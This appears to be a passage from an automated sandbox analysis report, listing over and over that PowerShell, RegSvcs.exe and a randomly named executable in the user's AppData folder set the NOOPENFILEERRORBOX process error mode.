                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
